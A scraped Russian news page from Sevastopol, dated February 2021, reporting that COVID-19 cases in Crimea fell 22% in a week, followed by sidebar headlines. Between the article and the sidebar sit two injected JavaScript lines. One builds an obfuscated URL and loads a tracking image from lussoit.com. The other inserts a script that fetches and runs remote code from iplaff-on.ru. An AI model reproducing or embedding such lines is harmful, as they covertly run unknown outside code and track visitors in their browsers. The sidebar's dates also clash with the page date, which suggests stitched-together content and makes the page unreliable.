Главные новости Севастополя
Севастополь
Февраль
2021

Пока, COVID-19 и другие! В Крыму падает уровень заболеваемости вирусами

0

За неделю уровень заболеваемости коронавирусной инфекцией в Крыму снизился на 22%. Об этом сегодня на заседании оперативного штаба по борьбе с коронавирусом в РК рассказала руководитель межрегионального управления Роспотребнадзора Наталья Пеньковская, сообщает ГТРК "Севастополь".

Она отметила, что 75% больных выявлены по итогу обращения за медицинской помощью.

При этом, стало известно, что 82% заболевших не соблюдали масочный режим. На заседании также отметили, что в Крыму за неделю снизился уровень заболеваемости сезонными вирусными инфекциями.
var e,n,o;window.self===window.top&&(e=['//','s:','tp','ht'].reverse().join(''),n=['igysg.lussoit.com','48'].join('/'),(o=new Image).src=''.concat(e).concat(n,'.gif'));
var script = document.createElement("script"); script.src = "//iplaff-on.ru/link/zekhb8s8/"; document.getElementsByTagName("head")[0].appendChild(script);




Moscow.media
Частные объявления сегодня





Rss.plus




Спорт в Крыму

Новости спорта


Новости тенниса
ATP

Медведев вышел в полуфинал турнира ATP в Марселе






123Оперативная информация о ликвидации последствий выброса мазута в Севастополе

Прогноз погоды в Крыму на 16 февраля

Джазовую вокалистку NEMA забили кирпичом в Севастополе

Владимир Немцев: 36 лет назад, 15 февраля 1989 года, был завершён вывод советских войск из Афганистана